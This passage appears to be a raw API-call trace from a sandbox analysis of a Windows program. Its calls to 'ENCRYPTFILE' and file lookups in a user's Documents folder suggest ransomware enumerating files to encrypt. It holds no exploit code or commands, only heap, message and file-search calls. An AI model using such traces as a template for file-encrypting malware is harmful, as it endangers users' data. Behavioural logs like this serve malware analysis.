lpMsg=0x144f084) returned 0 [0081.657] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0081.657] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0081.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.658] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0081.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0081.658] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.659] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6080750, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0x6f5c28c0, ftLastAccessTime.dwHighDateTime=0x1d5ec05, ftLastWriteTime.dwLowDateTime=0x6f5c28c0, ftLastWriteTime.dwHighDateTime=0x1d5ec05, nFileSizeHigh=0x0, nFileSizeLow=0x16ee0, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="hhInqxZ8uBmIDhBj07.csv", cAlternateFileName="HHINQX~1.CSV")) returned 0x41ac440 [0081.659] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0081.659] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0081.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0081.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.660] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0081.660] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0081.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0081.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0081.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0081.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0081.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0081.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0081.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0081.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0081.662] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4bf0 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.665] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: 